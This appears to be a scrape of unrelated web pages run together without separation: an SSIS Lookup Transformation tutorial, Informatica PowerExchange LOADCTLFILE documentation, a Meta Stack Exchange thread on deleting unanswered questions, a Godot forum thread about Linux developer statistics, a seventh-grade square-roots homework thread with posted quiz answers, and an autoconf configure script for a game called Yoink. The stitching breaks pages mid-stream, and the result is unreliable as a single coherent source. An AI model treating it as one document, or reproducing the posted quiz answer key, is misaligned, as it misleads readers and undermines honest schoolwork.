The Lookup Transformation in SSIS enables you to perform a similar relational inner and outer hash-joins. The main difference is that the operations occur outside the realm of the database engine and in the SSIS Data Flow. Typically, you would use this component within the context of an integration process, such as the ETL layer that populates a data warehouse from source systems. For example, you may want to populate a table in a destination system by joining data from two separate source systems on different database platforms.
Learn how to use SSIS, from beginner basics to advanced techniques, with online video tutorials taught by industry experts. Enroll for Free SSIS Training Demo!
The component can join only two data sets at a time, so in order to join three or more data sets, you would need to chain multiple Lookup Transformations together, using output from one Lookup Transformation as an input for another. Compare this to relational join semantics, whereby in a similar fashion you join two tables at a time and compose multiple such operations to join three or more tables.
The transformation is written to behave in a synchronous manner, meaning it does not block the pipeline while it is doing its work. While new rows are entering the Lookup Transformation, rows that have already been processed are leaving through one of four outputs. However, there is a catch here: in certain caching modes (discussed later in this Joining Data Topic) the component will initially block the package’s execution for a period of time while it loads its internal caches with the Lookup data.
The component provides several modes of operation that enable you to compare performance and resource usage. In full-cache mode, one of the tables you are joining is loaded in its entirety into memory, and then the rows from the other table flowed through the pipeline one buffer at a time, and the selected join operation is performed. With no up-front caching, each incoming row in the pipeline is compared one at a time to a specified relational table. Between these two options is a third that combines their behaviour. Each of these modes is explored later in this Post (see the “Full- Cache Mode,” “No-Cache Mode,” and “Partial-Cache Mode” sections).
Of course, some rows will join successfully, and some rows will not be joined. For example, consider a customer who has made no purchases. His or her identifier in the Customer table would have no matches in the sales table. SSIS supports this scenario by having multiple outputs on the Lookup Transformation. In the simplest (default/legacy) configuration, you would have one output for matched rows and a separate output for nonmatched and error rows. This functionality enables you to build robust (error-tolerant) processes that, for instance, might direct nonmatched rows to a staging area for further review. Or the errors can be ignored, and a Derived Column Transformation can be used to check for null values. A conditional statement can then be used to add default data in the Derived Column. A more detailed example is given later in this Post.
The Cache Connection Manager (CCM) is a separate component that is essential when creating advanced Lookup operations. The CCM enables you to populate the Lookup cache from an arbitrary source; for instance, you can load the cache from a relational query, an Excel file, a text file, or a Web service. You can also use the CCM to persist the Lookup cache across iterations of a looping operation. You can still use the Lookup Transformation without explicitly using the CCM, but you would then lose the resource and performance gains in doing so. CCM is described in more detail later in this Joining Data Topic.
Using The Lookup Transformation
The Lookup Transformation solves join differently than the Merge Join Transformation. The Lookup Transformation typically caches one of the data sets in memory and then compares each row arriving from the other data set in its input pipeline against the cache. The caching mechanism is highly configurable, providing a variety of different options in order to balance the performance and resource utilization of the process.
Full-Cache Mode
In full-cache mode, the Lookup Transformation stores all the rows resulting from a specified query in memory. The benefit of this mode is that Lookups against the in-memory cache are very fast — often an order of magnitude or more, relative to a no-cache mode Lookup. Full-cache mode is the default because in most scenarios it has the best performance of all of the techniques discussed in the Topic.
Continuing with the example package you built in the previous section (“Using the Merge Join Transformation”), you will in this section extend the existing package in order to join the other required tables. You already have the related values from the order header and order detail tables, but you still need to map the natural keys from the Product and Customer tables. You could use Merge Join Transformations again, but this example demonstrates how the Lookup Transformation can be of use here:
1. Open the package you created in the previous step. Remove the Union All Transformation. Drop a Lookup Transformation on the surface, name it LKP Customer, and connect the output of the Merge Join Transformation to it. Open the editor of the Lookup Transformation.
2. Select Full-Cache Mode, specifying an OLE DB Connection Manager. There is also an option to specify a Cache Connection Manager (CCM), but you won’t use this just yet — later in this Joining Data Topic you will learn how to use the CCM. (After you have learned about the CCM, you can return to this
exercise and try to use it here instead of the OLE DB Connection Manager.)
3. Click the Connection tab and select the AdventureWorks connection, and then use the following SQL query:select CustomerID, AccountNumber
from Sales.Customer;
4. Preview the results to ensure that everything is set up OK, then click the Columns tab. Drag the CustomerID column from the left-hand table over to the CustomerID column on the right; this creates a linkage between these two columns, which tells the component that this column is used to
perform the join. Click the checkbox next to the AccountNumber column on the right, which tells the component that you want to retrieve the AccountNumber values from the Customer table for each row it compares. Note that it is not necessary to retrieve the CustomerID values from the
right-hand side because you already have them from the input columns. The editor should now look like shown screenshot below.
CustomerID values
5. Click OK on the dialog, hook up a “trash” Union All Transformation . Create a Data Viewer on the match output path of the Lookup Transformation and execute the package (you could also attach a Data Viewer on the no-match output and error output if needed). You should see results similar to the below screenshot. Notice you have all the columns from the order and details data, as well as the selected column from the Customer table.
Customer table
Because the Customer table is so small and the package runs so fast, you may not have noticed what happened here. As part of the pre-execution phase of the component, the Lookup Transformation fetched all the rows from the Customer table using the query specified (because the Lookup was configured to execute in full-cache mode). In this case, there are only 20,000 or so rows, so this happens very quickly. Imagine that there were many more rows, perhaps two million. In this case, you would likely experience a delay between executing the package and seeing any data actually travelling down the second pipeline. below the screenshot shows a decision tree that demonstrates how the Lookup Transformation in full-cache mode operates at runtime. Note that the Lookup Transformation can be configured to send found and not-found rows to the same output, but the illustration assumes they are going to different outputs. In either case, the basic algorithm is the same.
Lookup Transformation
Check the Execution Results tab on the SSIS design surface (see below screenshot) and see how long it took for the data to be loaded into the in-memory cache. In larger data sets this number will be much larger and could even take longer than the execution of the primary functionality!
SSIS design surface
Note: If during development and testing you want to emulate a longrunning query, use the T-SQL waitfor statement in the query in the following manner.
waitfor delay ’00:00:059′; –Wait 5 seconds before returning any
rows
select CustomerID, AccountNumber
from Sales.Customer;
After fetching all the rows from the specified source, the Lookup Transformation caches them in memory in a special hash structure. The package then continues execution; as each input row enters the Lookup Transformation, the specified key values are compared to the in-memory hash values, and, if a match is found, the specified return values are added to the output stream.
No-Cache Mode
If the reference table (the Customer table in this case) is too large to cache all at once in the system’s memory, you can choose to cache nothing or you can choose to cache only some of the data. This section explores the first option: no-cache mode.
In no-cache mode, the Lookup Transformation is configured almost exactly the same as in full-cache mode, but at execution time the reference table is not loaded into the hash structure. Instead, as each input row flows through the Lookup Transformation, the component sends a request to the reference table in the database server to ask for a match. As you would expect, this can have a high-performance overhead on the system, so use this mode with care.
Depending on the size of the reference data, this mode is usually the slowest, though it scales to the largest number of reference rows. It is also useful for systems in which the reference data is highly volatile, such that any form of caching would render the results stale and erroneous.
Below the Screenshot illustrates the decision tree that the component uses during runtime. As before, the diagram assumes that separate outputs are configured for found and not-found rows, though the algorithm would be the same if all rows were sent to a single output.
no-cache mode
Here are the steps to build a package that uses no-cache mode:
1. Rather than build a brand-new package to try out no-cache mode, use the package you built in the previous section (“Full-Cache Mode”). Open the editor for the Lookup Transformation and on the first tab (General), choose the No-Cache option. This mode also enables you to customize (optimize) the query that SSIS will submit to the relational engine. To do this, click the Advanced tab and check the Modify the SQL Statement checkbox. In this case, the auto-generated statement is close enough to optimal, so you don’t need to touch it. (If you have any problems reconfiguring the Lookup Transformation, then delete the component, drop a new Lookup on the design surface, and reconnect and configure it from scratch.)
2. Execute the package. It should take slightly longer to execute than before, but the results should be the same.
The trade-off you make between the caching modes is one of performance versus resource utilization. Full-cache mode can potentially use a lot of memory to hold the reference rows in memory, but it is usually the fastest because Lookup operations do not require a trip to the database. No-cache mode, on the other hand, requires next to no memory, but it’s slower because it requires a database call for every Lookup. This is not a bad thing; if your reference table is volatile (i.e., the data changes often), you may want to use no-cache mode to ensure that you always have the latest version of each row.
Perfect guide for getting started to applied SSIS. Access to freeSSIS Tutorials
Partial-Cache Mode
Partial-cache mode gives you a middle ground between the no-cache and full-cache options. In this mode, the component caches only the most recently used data within the memory boundaries specified under the Advanced tab in the Lookup Transform. As soon as the cache grows too big, the least-used cache data is thrown away.
When the package starts, much like in no-cache mode, no data is preloaded into the Lookup cache. As each input row enters the component, it uses the specified key(s) to attempt to find a matching record in the reference table using the specified query. If a match is found, then both the key and the Lookup values are added to the local cache on a just-in-time basis. If that same key enters the Lookup Transformation again, it can retrieve the matching value from the local cache instead of the reference table, thereby saving the expense and time incurred of querying the database.
In the example scenario, for instance, suppose the input stream contains a CustomerID of 123. The first time the component sees this value, it goes to the database and tries to find it using the specified query. If it finds the value, it retrieves the AccountNumber and then adds the CustomerID/AccountNumber combination to its local cache. If CustomerCD 123 comes through again later, the component will retrieve the AccountNumber directly from the local cache instead of going to the database.
If, however, the key is not found in the local cache, the component will check the database to see if it exists there. Note that the key may not be in the local cache for several reasons: maybe it is the first time it was seen, maybe it was previously in the local cache but was evicted because of memory pressure, or finally, it could have been seen before but was also not found in the database.
For example, if CustomerID 456 enters the component, it will check the local cache for the value. Assuming it is not found, it will then check the database. If it finds it in the database, it will add 456 to its local cache. The next time CustomerID 456 enters the component, it can retrieve the value directly from its local cache without going to the database. However, it could also be the case that memory pressure caused this key/value to be dropped from the local cache, in which case the component will incur another database call.
If CustomerID 789 is not found in the local cache, and it is not subsequently found in the reference table, the component will treat the row as a nonmatch, and will send it down the output you have chosen for nonmatched rows (typically the no-match or error output). Every time that CustomerID 789 enters the component, it will go through these same set of operations. If you have a high degree of expected misses in your Lookup scenario, this latter behavior — though proper and expected — can be a cause of long execution times because database calls are expensive relative to a local cache check.
To avoid these repeated database calls while still getting the benefit of partialcache mode, you can use another feature of the Lookup Transformation: the miss cache. Using the partial-cache and miss-cache options together, you can realize further performance gains. You can specify that the component remembers values that it did not previously find in the reference table, thereby avoiding the expense of looking for them again. This feature goes a long way toward solving the performance issues discussed in the previous paragraph, because ideally every key is looked for once — and only once — in the reference table.
To configure this mode, follow these steps (refer to below screenshot):
partial-cache
1. Open the Lookup editor, and in the General tab select the Partial Cache option. In the Advanced tab, specify the upper memory boundaries for the cache and edit the SQL statement as necessary. Note that both 32-bit and 64-bit boundaries are available because the package may be built and
tested on a 32-bit platform but deployed to a 64-bit platform, which has more memory. Providing both options makes it simple to configure the component’s behavior on both platforms.
2. If you want to use the miss-cache feature, configure what percentage of the total cache memory you want to use for this secondary cache (say,25%).
The decision tree shown in Figure 7-22 demonstrates how the Lookup Transformation operates at runtime when using the partial-cache and misscache options. Note that some of the steps are conceptual; in reality, they are implemented using a more optimal design. As per the decision trees shown for the other modes, this illustration assumes separate outputs are used for the found and not-found rows.
decision trees
Multiple Outputs
At this point, your Lookup Transformation is working, and you have learned different ways to optimize its performance using fewer or more resources. In this section, you’ll learn how to utilize some of the other features in the component, such as the different outputs that are available.
Using the same package you built in the previous sections, follow these steps:
1. Reset the Lookup Transformation so that it works in full-cache mode. It so happens that, in this example, the data is clean and thus every row finds a match, but you can emulate rows not being found by playing quick and dirty with the Lookup query string. This is a useful trick to use at
design time in order to test the robustness and behaviour of your Lookup Transformations. Change the query statement in the Lookup Transformation as follows:select CustomerID, AccountNumber
from Sales.Customer
where CustomerID % 7 <> 0; –Remove 1/7 of the rows
2. Run the package again. This time, it should fail to execute fully because the cache contains one-seventh fewer rows than before, so some of the incoming keys will not find a match, as shown in Below Screenshot. Because the default error behaviour of the component is to fail on any nonmatch or error condition such as truncation, the Lookup halts as expected.
behavior of the component
Try some of the other output options. Open the Lookup editor and on the dropdown list box in the General tab, choose how you want the Lookup Transformation to behave when it does not manage to find a matching join entry:
->Fail Component should already be selected. This is the default behaviour, which causes the component to raise an exception and halt execution if a nonmatching row is found or a row causes ->an error such as data truncation. Ignore Failure sends any nonmatched rows and rows that cause errors down the same output as the matched rows, but the Lookup values (in this case AccountNumber) will be set to null. If you add a Data Viewer to the flow, you should be able to see this; several of the account numbers will have null values.
->Redirect Rows to Error Output is provided for backward compatibility with SQL Server 2005. It causes the component to send both nonmatched and error-causing rows down the same error (red) output.
->Redirect Rows to No Match Output causes errors to flow down the error (red) output, and no-match rows to flow down the no-match output.
3. Choose Ignore Failure and execute the package. The results should look like the below screenshot. You can see that the number of incoming rows on the Lookup Transformation matches the number of rows coming out of its match output, even though one-seventh of the rows were not actually matched. This is because the rows failed to find a match, but because you configured the Ignore Failure option, the component did not stop the execution.
packaged output
4. Open the Lookup Transformation and this time select “Redirect rows to error output.” In order to make this option work, you need a second trash destination on the error output of the Lookup Transformation, as shown in below screen shot. When you execute the package using this mode, the found rows will be sent down the match output, and unlike the previous modes, not-found rows will not be ignored or cause the component to fail but will instead be sent down the error output.
Redirect rows to error output
5. Finally, test the “Redirect rows to no match output” mode. You will need a total of three trash destinations for this to work, as shown in below screenshot.
Redirect rows to no match output
In all cases, add Data Viewers to each output, execute the package, and examine the results. The outputs should not contain any errors such as truncations, though there should be many nonmatched rows. So how exactly are these outputs useful? What can you do with them to make your packages more robust? In most cases, the errors or nonmatched rows can be piped off to a different area of the package where the values can be logged or fixed as per the business requirements. For example, one common solution is for all missing rows to be tagged with an Unknown member value. In this scenario, all nonmatched rows might have their AccountNumber set to 0000. These fixed values are then joined back into the main Data Flow and from there treated the same as the rows that did find a match. Use the following steps to configure the package to do this:
Frequently Asked SSIS Interview Questions & Answers
1. Open the Lookup editor. On the General tab, choose the “Redirect rows to no match output” option. Click the Error Output tab (see in below screenshot) and configure the AccountNumber column to have the value Fail Component under the Truncation column. This combination of settings means that you want a no-match output, but you don’t want an error output; instead, you want the component to fail on any errors. In a real-world scenario, you may want to have an error output that you can use to log values to an error table, but this example keeps it simple.
Redirect rows to no match output
2. At this point, you could drop a Derived Column Transformation on the design surface and connect the no-match output to it. Then you would add the AccountNumber column in the derived column, and use a Union All to bring the data back together. This approach works, but the partially blocking Union All slows down performance.
However, there is a better way to design the Data Flow. Set the Lookup to Ignore Errors. Drop a Derived Column on the Data Flow. Connect the match output to the derived column. Open the Derived Column editor and replace the AccountNumber column with the following expression.
ISNULL(AccountNumber)?(DT_STR,10,1252)”0000″:AccountNumber
The Derived Column Transformation dialog editor should now look something like below the screenshot.
Column Transformation dialog editor
Close the Derived Column editor, and drop a Union All Transformation on the surface. Connect the default output from the Derived Column to the Union All Transformation and then execute the package, as usual utilizing a Data Viewer on the final output. The package and results should look something like Below the screenshot.
Derived Column editor
The output should show AccountNumbers for most of the values, with 0000 shown for those keys that are not present in the reference query (in this case because you artificially removed them).
Expressional Properties
If you need to build a package whose required reference table is not known at design time, this feature will be useful for you. Instead of using a static query in the Lookup Transformation, you can use an expression, which can dynamically construct the query string, or it could load the query string using the parameters feature.
below the screenshot shows an example of using an expression within a Lookup Transformation. Expressions on Data Flow Components can be accessed from the property page of the Data Flow Task itself.
Expressionable Properties
Cascaded Lookup Operations
Sometimes the requirements of a real-world Data Flow may require several Lookup Transformations to get the job done. By using multiple Lookup Transformations, you can sometimes achieve a higher degree of performance without incurring the associated memory costs and processing times of using a single Lookup.
Imagine you have a large list of products that ideally you would like to load into one Lookup. You consider using full-cache mode; however, because of the sheer number of rows, either you run out of memory when trying to load the cache or the cache-loading phase takes so long that it becomes impractical (for instance, the package takes 15 minutes to execute, but 6 minutes of that time is spent just loading the Lookup cache). Therefore, you consider nocache mode, but the expense of all those database calls makes the solution too slow. Finally, you consider partial-cache mode, but again the expense of the initial database calls (before the internal cache is populated with enough data to be useful) is too high.
The solution to this problem is based on a critical assumption that there is a subset of reference rows (in this case product rows) that are statistically likely to be found in most, if not all, data loads. For instance, if the business is a consumer goods chain, then it’s likely that a high proportion of sales transactions are from people who buy milk. Similarly, there will be many transactions for the sales of bread, cheese, beer, and baby diapers. On the contrary, there will be a relatively low number of sales for expensive wines. Some of these trends may be seasonal — more suntan lotion sold in summer, and more heaters sold in winter. This same assumption applies to other dimensions besides products — for instance, a company specializing in direct sales may know historically which customers (or customer segments or loyalty members) have responded to specific campaigns. A bank might know which accounts (or account types) have the most activity at specific times of the month.
This statistical property does not hold true for all data sets, but if it does, you may derive great benefit from this pattern. If it doesn’t, you may still find this section useful as you consider the different ways of approaching a problem and solving it with SSIS.
So how do you use this statistical approach to build your solution? Using the consumer goods example, if it is the middle of winter and you know you are not going to be selling much suntan lotion, then why load the suntan products in the Lookup Transformation? Rather, load just the high-frequency items like milk, bread, and cheese. Because you know you will see those items often, you want to put them in a Lookup Transformation configured in full cache mode. If your Product table has, say, 1 million items, then you could load the top 20% of them (in terms of frequency/popularity) into this first Lookup. That way, you don’t spend too much time loading the cache (because it is only 200,000 rows and not 1,000,000); by the same reasoning, you don’t use as much memory.
Of course, in any statistical approach, there will always be outliers — for instance, in the previous example suntan lotion will still be sold in winter to people going on holiday to sunnier places. Therefore, if any Lookups fail on the first full-cache Lookup, you need a second Lookup to pick up the strays. The second Lookup would be configured in partial-cache mode (as detailed earlier in this Post), which means it would make database calls in the event that the item was not found in its dynamically growing internal cache. The first Lookup’s not-found output would be connected to the second Lookup’s input, and both of the Lookups would have their found outputs combined using a Union All Transformation in order to send all the matches downstream. Then a third Lookup is used in no-cache mode to look up any remaining rows not found already. This final Lookup output is combined with the others in another Union All. Below the screenshot shows what such a package might look like.
package
The benefit of this approach is that at the expense of a little more development time, you now have a system that performs efficiently for the most common Lookups and fails over to a slower mode for those items that are less common. That means that the Lookup operation will be extremely efficient for most of your data, which typically results in an overall decrease in processing time.
In other words, you have used the Pareto principle (80/20 rule) to improve the solution. The first (full-cache) Lookup stores 20% of the reference (in this case product) rows and hopefully succeeds in answering 80% of the Lookup requests. This is largely dependent on the user creating the right query to get the proper 20%. If the wrong data is queried then this can be a worst approach. For the 20% of Lookups that fail, they are redirected to — and serviced by — the partial-cache Lookup, which operates against the other 80% of data. Because you are constraining the size of the partial cache, you can ensure you don’t run into any memory limitations — at the extreme, you could even use a no-cache Lookup instead of, or in addition to, the partialcache Lookup.
Explore SSIS Sample Resumes! Download & Edit, Get Noticed by Top Employers!Download Now!
The final piece to this puzzle is how you identify upfront which items occur the most frequently in your domain. If the business does not already keep track of this information, you can derive it by collecting statistics within your packages and saving the results to a temporary location. For instance, each time you load your sales data, you could aggregate the number of sales for each item and write the results to a new table you have created for that purpose. The next time you load the product Lookup Transformation, you join the full Product table to the statistics table and return only those rows whose aggregate count is above a certain threshold. (You could also use the data-mining functionality in SQL Server to derive this information, though the details of that are beyond the scope of Joining Data Topic.)
List of Related Microsoft Certification Courses:
SSRS Power BI
SSAS SQL Server
SCCM SQL Server DBA
SharePoint BizTalk Server
Team Foundation Server BizTalk Server Administrator
Join our newsletter
inbox
Stay updated with our newsletter, packed with Tutorials, Interview Questions, How-to's, Tips & Tricks, Latest Trends & Updates, and more ➤ Straight to your inbox!
Course Schedule
NameDates
SSIS TrainingJan 22 to Feb 06
SSIS TrainingJan 24 to Feb 08
SSIS TrainingJan 29 to Feb 13
SSIS TrainingJan 31 to Feb 15
Last updated: 28 Oct 2020
About Author
Remy Sharp
Yamuna Karumuri
Yamuna Karumuri is a content writer at Mindmajix.com. Her passion lies in writing articles on IT platforms including Machine learning, PowerShell, DevOps, Data Science, Artificial Intelligence, Selenium, MSBI, and so on. You can connect with her via LinkedIn.
Recommended Courses
1 / 15
|
__label__pos
| 0.843363 |
Table of Contents
Search
1. Preface
2. Introduction to PowerExchange
3. DBMOVER Configuration File
4. Netport Jobs
5. PowerExchange Message Logs and Destination Overrides
6. SMF Statistics Logging and Reporting
7. PowerExchange Security
8. Secure Sockets Layer Support
9. PowerExchange Alternative Network Security
10. PowerExchange Nonrelational SQL
11. PowerExchange Globalization
12. Using the PowerExchange ODBC Drivers
13. PowerExchange Datatypes and Conversion Matrix
14. Appendix A: DTL__CAPXTIMESTAMP Time Stamps
15. Appendix B: PowerExchange Glossary
LOADCTLFILE Statement
LOADCTLFILE Statement
The LOADCTLFILE statement specifies the PDS data set that contains the control card template member for DB2 for z/OS LOAD utility batch jobs.
z/OS
DB2 for z/OS
No
LOADCTLFILE={
pds_name
|
A
}
For the
pds_name
variable, enter the PDS data set that contains the control card template member for DB2 for z/OS LOAD utility batch jobs. PowerExchange reads this data set on the system where you perform the bulk load. Default is A.
• When you install PowerExchange, the z/OS Installation Assistant includes your RUNLIB data set name in the LOADCTLFILE statement in the DBMOVER member.
• PowerExchange provides the following DB2 LOAD control card template members in RUNLIB:
• DB2LDCTL
. Sample control card statements for nonpartitioned tables.
• DB2LDCTP
. Sample control card statements for partitioned tables.
|
__label__pos
| 0.752185 |
What is meta? ×
Meta Stack Exchange is where users like you discuss bugs, features, and support issues that affect the software powering all 145 Stack Exchange communities.
I have a couple of questions on SO, :
1: Codeigniter - How can I sort my database result object (sorting php objects)
2: Codeigniter 2 active record — How do I create temporary table to apply second sort order?
Both I feel are interesting valid questions I would like an answer to, both pertain to the same problem - I was seeking two different approaches to solving the same problem, extensive google searches didn't find an answer.
Both have answers which do not answer the question and are stuck (one says there is no way of doing it the way I proposed and prompted question 2, the other needs more input from me but is veering towards an approach other than that requested.
Finally, I have found a third solution which does not relate (directly) to either solution but works great for my needs.
The trouble is, I dont really have time to set up tests and examples for these old approaches to move the questions forward.
Quite often when I find a solution before anyone answers - I post it myself as an answer, but in this case it doesn't answer the question asked (although it does solve the problem behind it).
Any suggestions on what I should do here - shall I just delete them, or shall I leave them up unattended in the hope someone knows how.
My thoughts are, delete the one I am told not possible, leave the other. Although this is about specific posts, are their any general guidelines for deleting questions?
share|improve this question
2 Answers 2
up vote 4 down vote accepted
Well, first, you may not be able to delete your questions because they have answers (unless there are no upvotes on them...).
That being said, even if they could be deleted, I would leave them up in case someone does come up with an answer in the future. Just because no one has given a satisfactory answer yet (to the question asked) does not mean that there won't be one in the future.
A good question without answers is still a good question and should remain (at least IMO).
share|improve this answer
Just a note: as long as the answers have received no upvotes, the question can technically still be deleted. – Bart Sep 24 '12 at 14:17
Ah, I have learned something new. Thanks! – Barak Sep 24 '12 at 14:17
It is not just SO you have to consider. A large number of people access the information on SO via google. Google indexes SO with what it calls "real-time search". (Indeed new questions can be accessed within seconds).
Additionally the deleted (answerless) SO questions tend to stick around for a while in the google index. So in a way you might be doing a disservice to google-users...
So if the question has no answers, and almost no views in a period over a year and you regret ever having asked this question, I would say it is OK to delete it, otherwise keep working and improving it. For instance by including links to resources you found meanwhile.
Anyways, that's my take...
share|improve this answer
You must log in to answer this question.
Not the answer you're looking for? Browse other questions tagged .
|
__label__pos
| 0.530897 |
Post a New Question
7th grade math help square roots
posted by .
4.
Wei-Min makes a square quilt that has an area of 100 square feet. It has 25 square blocks, each the same size. What is the length of each side of a block?
2 feet
4 feet
6 feet
10 feet
What is the value of "x" if 25^2 = x?
125
0
625
5
• 7th grade math help square roots -
I'll be glad to check your answers.
I suggest you draw a picture of the quilt.
• 7th grade math help square roots -
D
C
• 7th grade math help square roots -
dab
• 7th grade math help square roots -
These are the correct answers for Unit 4, Lesson 1: Squares and Square Roots
1. A
2. B
3. D
4. A
5. C
Hope this helps!
• 7th grade math help square roots -
omg thank you Donut!!!
Respond to this Question
First Name
School Subject
Your Answer
Similar Questions
More Related Questions
Post a New Question
|
__label__pos
| 0.999957 |
Any stats on Linux game devs?
Are there any polls on which OS platforms Godot game developers use in 2024? I am particularly interested in Linux percent but Mac also.
1 Like
you can use reports on the monthly “Steam Hardware & Software Survey” as an overall gaming platform indicator .
https://store.steampowered.com/hwsurvey/
I understand target platforms, but why is it important which platforms devs use anyway?
1 Like
They haven’t done their annual poll yet this year, but there’s data from 2023:
1 Like
Many dev tools are easier to develop for Linux/Mac than Windows initially only because there is pretty decent open source code/compiling/debugging documentation. Not that there is anything wrong with Windows :). I also want to know if devs use WSL on Windows and if they have any good or bad experiences.
1 Like
where ther are sharing this polls?
There’s a post in the news/blog section of the main website, but I think they also post links to social media and probably this forum too.
okey thanks :smiley:
I use Windows and Linux, depending on the specific task. Both systems have their advantages and disadvantages, so using them both at once always worked best for me.
My WSL experiences were rather bad. I used a full Hyper-V Linux VM for a while before getting a real secondary Linux PC at some point.
Using Linux as full development environment for (Godot) games works pretty well nowadays, but you most likely still want to develop for Windows (90%+ market share), which includes testing your games on an actual Windows machine. C# with NativeAOT enabled also doesn’t support cross-compilation, so if you are using that you will need Windows anyways.
Another sidenote: there are quite a few OS specific differences in Godot and .NET, so testing any somewhat advanced game on all target platforms is absolutely mandatory.
|
__label__pos
| 0.741514 |
# # Yoink # Process this file with autoconf to produce a configure script. # AC_PREREQ(2.61) AC_INIT([Yoink],[0.1],[[email protected]],[yoink]) AC_CANONICAL_TARGET AC_CONFIG_SRCDIR([src/version.c]) AC_CONFIG_MACRO_DIR([m4]) AM_INIT_AUTOMAKE([dist-bzip2 no-dist-gzip]) # # Determine the target platform. # case "${host}" in *mingw32*) WIN32=yes ;; *-apple-darwin*) MACOSX=yes ;; *netbsd*) NETBSD=yes ;; esac AM_CONDITIONAL([WIN32], [test x$WIN32 = xyes]) AM_CONDITIONAL([MACOSX], [test x$MACOSX = xyes]) AM_CONDITIONAL([NETBSD], [test x$NETBSD = xyes]) # # Checks for configuration arguments. # AC_ARG_ENABLE([debug], [AS_HELP_STRING([--enable-debug], [include debugging symbols and code paths])], [debug=$enableval], [debug=no]) AC_ARG_ENABLE([double-precision], [AS_HELP_STRING([--enable-double-precision], [use doubles instead of floats])], [double_precision=$enableval], [double_precision=no]) AC_ARG_ENABLE([profile], [AS_HELP_STRING([--enable-profile], [make a binary with code profiling instructions])], [profile=$enableval], [profile=no]) AC_ARG_ENABLE([extra-warnings], [AS_HELP_STRING([--enable-extra-warnings], [make the gcc compiler give more warnings])], [extra_warnings=$enableval], [extra_warnings=no]) AC_ARG_ENABLE([link-sh], [AS_HELP_STRING([--enable-link-sh], [give the executable fewer direct dependencies])], [link_sh=$enableval], [link_sh=no]) AC_ARG_ENABLE([clock_gettime], [AS_HELP_STRING([--enable-clock_gettime], [use clock_gettime() instead of SDL_GetTicks()])], [clock_gettime=$enableval], [clock_gettime=no]) AC_ARG_ENABLE([threads], [AS_HELP_STRING([--enable-threads], [use threads for concurrency where appropriate])], [threads=$enableval], [threads=no]) AC_ARG_WITH([gui-toolkit], [AS_HELP_STRING([--with-gui-toolkit=ARG], [possible values: none (default), gtk, qt4])], [gui_toolkit=$withval], [gui_toolkit=none]) if test x$debug = xyes then CFLAGS="$CFLAGS -DDEBUG -ggdb -O0 -Wall -Wno-uninitialized" CXXFLAGS="$CXXFLAGS -DDEBUG -ggdb -O0 -Wall -Wno-uninitialized" else CFLAGS="$CFLAGS -DNDEBUG" CXXFLAGS="$CXXFLAGS -DNDEBUG" fi if test x$double_precision = xyes then AC_DEFINE([USE_DOUBLE_PRECISION], 1, [Define to 1 if you want to use doubles instead of floats.]) fi if test x$profile = xyes then CFLAGS="$CFLAGS -pg" CXXFLAGS="$CXXFLAGS -pg" AC_DEFINE([PROFILING_ENABLED], 1, [Define to 1 if profiling is built in.]) fi if test x$extra_warnings = xyes then CFLAGS="$CFLAGS -Wextra -Wno-unused-parameter" CXXFLAGS="$CXXFLAGS -Wextra -Wno-unused-parameter" fi AM_CONDITIONAL([LINK_SH], [test x$link_sh = xyes]) if test x$threads = xyes then AC_DEFINE([USE_THREADS], 1, [Define to 1 if you want to use threads when applicable.]) fi if test x$gui_toolkit = xgtk then AC_DEFINE([USE_GTK], 1, [Define to 1 if you want to use GTK+ modal dialogs.]) elif test x$gui_toolkit = xqt4 then AC_DEFINE([USE_QT4], 1, [Define to 1 if you want to use QT4 modal dialogs.]) fi if test "x$prefix" = xNONE then prefix="$ac_default_prefix" fi if test x$WIN32 = xyes then DATADIR="data" else eval eval DATADIR="${datadir}/$PACKAGE" fi AC_SUBST([DATADIR]) AC_DEFINE_UNQUOTED([YOINK_DATADIR], ["$DATADIR"], [Define to the path of the game asset directory.]) #### AC_MSG_NOTICE([Checks for programs.]) #### AC_PROG_CXX AC_PROG_CC AC_PROG_INSTALL AC_PROG_RANLIB AM_PROG_CC_C_O PKG_PROG_PKG_CONFIG AC_PATH_PROGS([CUT], [cut]) if test x$CUT = x then AC_MSG_ERROR([The cut program is required.]) fi AC_PATH_PROGS([FIND], [find]) if test x$FIND = x then AC_MSG_ERROR([The find program is required.]) fi if test x$WIN32 = xyes then AC_PATH_PROGS([WINDRES], [windres $host_alias-windres $host_os-windres]) if test x$WINDRES = x then AC_MSG_ERROR([The windres program is required.]) fi AC_PATH_PROGS([ZIP], [zip]) if test x$ZIP = x then AC_MSG_WARN([The zip program is needed to build a portable package.]) fi AC_PATH_PROGS([MAKENSIS], [makensis]) if test x$MAKENSIS = x then AC_MSG_WARN([The makensis program is needed to build an installer.]) fi AC_PATH_PROGS([GROFF], [groff]) if test x$GROFF = x then AC_MSG_WARN([The groff program is needed to create the manual page.]) fi elif test x$NETBSD = xyes then AC_PATH_PROGS([PKGLINT], [pkglint]) fi AM_CONDITIONAL([HAVE_MAKENSIS], [test x$MAKENSIS != x]) #### AC_MSG_NOTICE([Checks for libraries.]) #### ##### SDL ##### website="http://www.libsdl.org/" PKG_CHECK_MODULES([SDL], [sdl], [LIBS="$LIBS $SDL_LIBS" CFLAGS="$CFLAGS $SDL_CFLAGS" CXXFLAGS="$CXXFLAGS $SDL_CFLAGS"], [missing=yes AC_MSG_WARN([Missing SDL ($website)])]) ##### opengl, glu ##### website="http://www.mesa3d.org/" PKG_CHECK_MODULES([OPENGL], [gl glu], [LIBS="$LIBS $OPENGL_LIBS" CFLAGS="$CFLAGS $OPENGL_CFLAGS" CXXFLAGS="$CXXFLAGS $OPENGL_CFLAGS"], [missing=yes AC_MSG_WARN([Missing OpenGL ($website)])]) ##### libpng ##### website="http://www.libpng.org/pub/png/libpng.html" PKG_CHECK_MODULES([PNG], [libpng], [LIBS="$LIBS $PNG_LIBS" CFLAGS="$CFLAGS $PNG_CFLAGS" CXXFLAGS="$CXXFLAGS $PNG_CFLAGS"], [missing=yes AC_MSG_WARN([Missing libpng ($website)])]) ##### openal ##### website="http://connect.creativelabs.com/openal/" PKG_CHECK_MODULES([OPENAL], [openal], [LIBS="$LIBS $OPENAL_LIBS" CFLAGS="$CFLAGS $OPENAL_CFLAGS" CXXFLAGS="$CXXFLAGS $OPENAL_CFLAGS"], [missing=yes AC_MSG_WARN([Missing OpenAL ($website)])]) ##### libvorbis ##### website="http://www.xiph.org/downloads/" PKG_CHECK_MODULES([VORBIS], [vorbisfile], [LIBS="$LIBS $VORBIS_LIBS" CFLAGS="$CFLAGS $VORBIS_CFLAGS" CXXFLAGS="$CXXFLAGS $VORBIS_CFLAGS"], [missing=yes AC_MSG_WARN([Missing libvorbisfile ($website)])]) 